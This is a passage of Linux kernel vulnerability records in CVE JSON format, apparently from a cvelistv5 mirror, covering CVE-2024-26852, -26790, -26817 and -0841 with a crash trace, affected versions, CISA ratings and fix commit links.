netlink_rcv_skb+0x1e3/0x430 net/netlink/af_netlink.c:2543\n netlink_unicast_kernel net/netlink/af_netlink.c:1341 [inline]\n netlink_unicast+0x7ea/0x980 net/netlink/af_netlink.c:1367\n netlink_sendmsg+0xa3b/0xd70 net/netlink/af_netlink.c:1908\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg+0x221/0x270 net/socket.c:745\n ____sys_sendmsg+0x525/0x7d0 net/socket.c:2584\n ___sys_sendmsg net/socket.c:2638 [inline]\n __sys_sendmsg+0x2b0/0x3a0 net/socket.c:2667\n do_syscall_64+0xf9/0x240\n entry_SYSCALL_64_after_hwframe+0x6f/0x77\nRIP: 0033:0x7f73dd87dda9\nCode: 28 00 00 00 75 05 48 83 c4 28 c3 e8 e1 20 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007f73de6550c8 EFLAGS: 00000246 ORIG_RAX: 000000000000002e\nRAX: ffffffffffffffda RBX: 00007f73dd9ac050 RCX: 00007f73dd87dda9\nRDX: 0000000000000000 RSI: 0000000020000140 RDI: 0000000000000005\nRBP: 00007f73dd8ca47a R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 000000000000006e R14: 00007f73dd9ac050 R15: 00007ffdbdeb7858\n \u003c/TASK\u003e\n\nAllocated by task 23037:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x3f/0x80 mm/kasan/common.c:68\n poison_kmalloc_redzone mm/kasan/common.c:372 [inline]\n __kasan_kmalloc+0x98/0xb0 mm/kasan/common.c:389\n kasan_kmalloc include/linux/kasan.h:211 [inline]\n __do_kmalloc_node mm/slub.c:3981 [inline]\n __kmalloc+0x22e/0x490 mm/slub.c:3994\n kmalloc include/linux/slab.h:594 [inline]\n kzalloc include/linux/slab.h:711 [inline]\n fib6_info_alloc+0x2e/0xf0 net/ipv6/ip6_fib.c:155\n ip6_route_info_create+0x445/0x12b0 net/ipv6/route.c:3758\n ip6_route_multipath_add net/ipv6/route.c:5298 [inline]\n inet6_rtm_newroute+0x744/0x2300 net/ipv6/route.c:5517\n rtnetlink_rcv_msg+0x885/0x1040 net/core/rtnetlink.c:6597\n netlink_rcv_skb+0x1e3/0x430 net/netlink/af_netlink.c:2543\n netlink_unicast_kernel net/netlink/af_netlink.c:1341 [inline]\n netlink_unicast+0x7ea/0x980 net/netlink/af_netlink.c:1367\n netlink_sendmsg+0xa3b/0xd70 net/netlink/af_netlink.c:1908\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg+0x221/0x270 net/socket.c:745\n ____sys_sendmsg+0x525/0x7d0 net/socket.c:2584\n ___sys_sendmsg net/socket.c:2638 [inline]\n __sys_sendmsg+0x2b0/0x3a0 net/socket.c:2667\n do_syscall_64+0xf9/0x240\n entry_SYSCALL_64_after_hwframe+0x6f/0x77\n\nFreed by task 16:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x3f/0x80 mm/kasan/common.c:68\n kasan_save_free_info+0x4e/0x60 mm/kasan/generic.c:640\n poison_slab_object+0xa6/0xe0 m\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:58.505Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/31ea5bcc7d4cd1423de6be327a2c034725704136"
},
{
"url": "https://git.kernel.org/stable/c/664f9c647260cc9d68b4e31d9899530d89dd045e"
},
{
"url": "https://git.kernel.org/stable/c/79ce2e54cc0ae366f45516c00bf1b19aa43e9abe"
},
{
"url": "https://git.kernel.org/stable/c/cae3303257950d03ffec2df4a45e836f10d26c24"
},
{
"url": "https://git.kernel.org/stable/c/394334fe2ae3b9f1e2332b873857e84cb28aac18"
},
{
"url": "https://git.kernel.org/stable/c/ed883060c38721ed828061f6c0c30e5147326c9a"
},
{
"url": "https://git.kernel.org/stable/c/61b34f73cdbdb8eaf9ea12e9e2eb3b29716c4dda"
},
{
"url": "https://git.kernel.org/stable/c/685f7d531264599b3f167f1e94bbd22f120e5fab"
}
],
"title": "net/ipv6: avoid possible UAF in ip6_route_mpath_notify()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26852",
"datePublished": "2024-04-17T10:17:15.923Z",
"dateReserved": "2024-02-19T14:20:24.183Z",
"dateUpdated": "2025-05-04T08:57:58.505Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26790 (GCVE-0-2024-26790)
Vulnerability from cvelistv5
Published
2024-04-04 08:20
Modified
2025-05-04 08:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
dmaengine: fsl-qdma: fix SoC may hang on 16 byte unaligned read
There is chip (ls1028a) errata:
The SoC may hang on 16 byte unaligned read transactions by QDMA.
Unaligned read transactions initiated by QDMA may stall in the NOC
(Network On-Chip), causing a deadlock condition. Stalled transactions will
trigger completion timeouts in PCIe controller.
Workaround:
Enable prefetch by setting the source descriptor prefetchable bit
( SD[PF] = 1 ).
Implement this workaround.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 Version: b092529e0aa09829a6404424ce167bf3ce3235e2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26790",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-04T16:24:55.798835Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:16.312Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.493Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/518d78b4fac68cac29a263554d7f3b19da99d0da"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bb3a06e9b9a30e33d96aadc0e077be095a4f8580"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/106c1ac953a66556ec77456c46e818208d3a9bce"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/237ecf1afe6c22534fa43abdf2bf0b0f52de0aaa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5b696e9c388251f1c7373be92293769a489fd367"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad2f8920c314e0a2d9e984fc94b729eca3cda471"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9d739bccf261dd93ec1babf82f5c5d71dd4caa3e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/dma/fsl-qdma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "518d78b4fac68cac29a263554d7f3b19da99d0da",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "bb3a06e9b9a30e33d96aadc0e077be095a4f8580",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "106c1ac953a66556ec77456c46e818208d3a9bce",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "237ecf1afe6c22534fa43abdf2bf0b0f52de0aaa",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "5b696e9c388251f1c7373be92293769a489fd367",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "ad2f8920c314e0a2d9e984fc94b729eca3cda471",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
},
{
"lessThan": "9d739bccf261dd93ec1babf82f5c5d71dd4caa3e",
"status": "affected",
"version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/dma/fsl-qdma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.271",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: fsl-qdma: fix SoC may hang on 16 byte unaligned read\n\nThere is chip (ls1028a) errata:\n\nThe SoC may hang on 16 byte unaligned read transactions by QDMA.\n\nUnaligned read transactions initiated by QDMA may stall in the NOC\n(Network On-Chip), causing a deadlock condition. Stalled transactions will\ntrigger completion timeouts in PCIe controller.\n\nWorkaround:\nEnable prefetch by setting the source descriptor prefetchable bit\n( SD[PF] = 1 ).\n\nImplement this workaround."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:56:35.788Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/518d78b4fac68cac29a263554d7f3b19da99d0da"
},
{
"url": "https://git.kernel.org/stable/c/bb3a06e9b9a30e33d96aadc0e077be095a4f8580"
},
{
"url": "https://git.kernel.org/stable/c/106c1ac953a66556ec77456c46e818208d3a9bce"
},
{
"url": "https://git.kernel.org/stable/c/237ecf1afe6c22534fa43abdf2bf0b0f52de0aaa"
},
{
"url": "https://git.kernel.org/stable/c/5b696e9c388251f1c7373be92293769a489fd367"
},
{
"url": "https://git.kernel.org/stable/c/ad2f8920c314e0a2d9e984fc94b729eca3cda471"
},
{
"url": "https://git.kernel.org/stable/c/9d739bccf261dd93ec1babf82f5c5d71dd4caa3e"
}
],
"title": "dmaengine: fsl-qdma: fix SoC may hang on 16 byte unaligned read",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26790",
"datePublished": "2024-04-04T08:20:21.742Z",
"dateReserved": "2024-02-19T14:20:24.178Z",
"dateUpdated": "2025-05-04T08:56:35.788Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26817 (GCVE-0-2024-26817)
Vulnerability from cvelistv5
Published
2024-04-13 11:17
Modified
2025-11-04 18:29
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
amdkfd: use calloc instead of kzalloc to avoid integer overflow
This uses calloc instead of doing the multiplication which might
overflow.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4a488a7ad71401169cecee75dc94bcce642e2c53 Version: 4a488a7ad71401169cecee75dc94bcce642e2c53 Version: 4a488a7ad71401169cecee75dc94bcce642e2c53 Version: 4a488a7ad71401169cecee75dc94bcce642e2c53 Version: 4a488a7ad71401169cecee75dc94bcce642e2c53 Version: 4a488a7ad71401169cecee75dc94bcce642e2c53 Version: 4a488a7ad71401169cecee75dc94bcce642e2c53 Version: 4a488a7ad71401169cecee75dc94bcce642e2c53 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26817",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-15T12:56:37.523191Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:22:41.285Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T18:29:59.654Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e6721ea845fcb93a764a92bd40f1afc0d6c69751"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8b0564704255c6b3c6a7188e86939f754e1577c0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fcbd99b3c73309107e3be71f20dff9414df64f91"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cbac7de1d9901521e78cdc34e15451df3611f2ad"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e6768c6737f4c02cba193a3339f0cc2907f0b86a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/315eb3c2df7e4cb18e3eacfa18a53a46f2bf0ef7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0c33d11153949310d76631d8f4a4736519eacd3a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3b0daecfeac0103aba8b293df07a0cbaf8b43f29"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P3TH6JK7ZZMSXSVHOJKIMSSOC6EQM4WV/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdkfd/kfd_chardev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e6721ea845fcb93a764a92bd40f1afc0d6c69751",
"status": "affected",
"version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
"versionType": "git"
},
{
"lessThan": "8b0564704255c6b3c6a7188e86939f754e1577c0",
"status": "affected",
"version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
"versionType": "git"
},
{
"lessThan": "fcbd99b3c73309107e3be71f20dff9414df64f91",
"status": "affected",
"version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
"versionType": "git"
},
{
"lessThan": "cbac7de1d9901521e78cdc34e15451df3611f2ad",
"status": "affected",
"version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
"versionType": "git"
},
{
"lessThan": "e6768c6737f4c02cba193a3339f0cc2907f0b86a",
"status": "affected",
"version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
"versionType": "git"
},
{
"lessThan": "315eb3c2df7e4cb18e3eacfa18a53a46f2bf0ef7",
"status": "affected",
"version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
"versionType": "git"
},
{
"lessThan": "0c33d11153949310d76631d8f4a4736519eacd3a",
"status": "affected",
"version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
"versionType": "git"
},
{
"lessThan": "3b0daecfeac0103aba8b293df07a0cbaf8b43f29",
"status": "affected",
"version": "4a488a7ad71401169cecee75dc94bcce642e2c53",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdkfd/kfd_chardev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.19"
},
{
"lessThan": "3.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.86",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.86",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.27",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.6",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\namdkfd: use calloc instead of kzalloc to avoid integer overflow\n\nThis uses calloc instead of doing the multiplication which might\noverflow."
}
],
"providerMetadata": {
"dateUpdated": "2025-09-16T08:02:32.138Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e6721ea845fcb93a764a92bd40f1afc0d6c69751"
},
{
"url": "https://git.kernel.org/stable/c/8b0564704255c6b3c6a7188e86939f754e1577c0"
},
{
"url": "https://git.kernel.org/stable/c/fcbd99b3c73309107e3be71f20dff9414df64f91"
},
{
"url": "https://git.kernel.org/stable/c/cbac7de1d9901521e78cdc34e15451df3611f2ad"
},
{
"url": "https://git.kernel.org/stable/c/e6768c6737f4c02cba193a3339f0cc2907f0b86a"
},
{
"url": "https://git.kernel.org/stable/c/315eb3c2df7e4cb18e3eacfa18a53a46f2bf0ef7"
},
{
"url": "https://git.kernel.org/stable/c/0c33d11153949310d76631d8f4a4736519eacd3a"
},
{
"url": "https://git.kernel.org/stable/c/3b0daecfeac0103aba8b293df07a0cbaf8b43f29"
}
],
"title": "amdkfd: use calloc instead of kzalloc to avoid integer overflow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26817",
"datePublished": "2024-04-13T11:17:08.764Z",
"dateReserved": "2024-02-19T14:20:24.180Z",
"dateUpdated": "2025-11-04T18:29:59.654Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-0841 (GCVE-0-2024-0841)
Vulnerability from cvelistv5
Published
2024-01-28 11:20
Modified
2025-11-06 19:54
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-476 - NULL Pointer Dereference
Summary
A null pointer dereference flaw was found in the hugetlbfs_fill_super function in the Linux kernel hugetlbfs (HugeTLB pages) functionality. This issue may allow a local user to crash the system or potentially escalate their privileges on the system.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.rt7.342.el8_10 < * cpe:/a:redhat:enterprise_linux:8::nfv cpe:/a:redhat:enterprise_linux:8::realtime |
|||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-01T18:18:18.949Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2024:2394",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2394"
},
{
"name": "RHSA-2024:2950",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2950"
},
{
"name": "RHSA-2024:3138",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3138"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-0841"
},
{
"name": "RHBZ#2256490",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2256490"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-0841",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-05-08T15:50:50.798864Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-05-29T15:11:12.724Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::nfv",
"cpe:/a:redhat:enterprise_linux:8::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-553.rt7.342.el8_10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8::baseos",
"cpe:/a:redhat:enterprise_linux:8::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-553.el8_10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-427.13.1.el9_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-427.13.1.el9_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"datePublic": "2024-01-23T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A null pointer dereference flaw was found in the hugetlbfs_fill_super function in the Linux kernel hugetlbfs (HugeTLB pages) functionality. This issue may allow a local user to crash the system or potentially escalate their privileges on the system."
}
],
"metrics": [
{
"other": {
"content": {
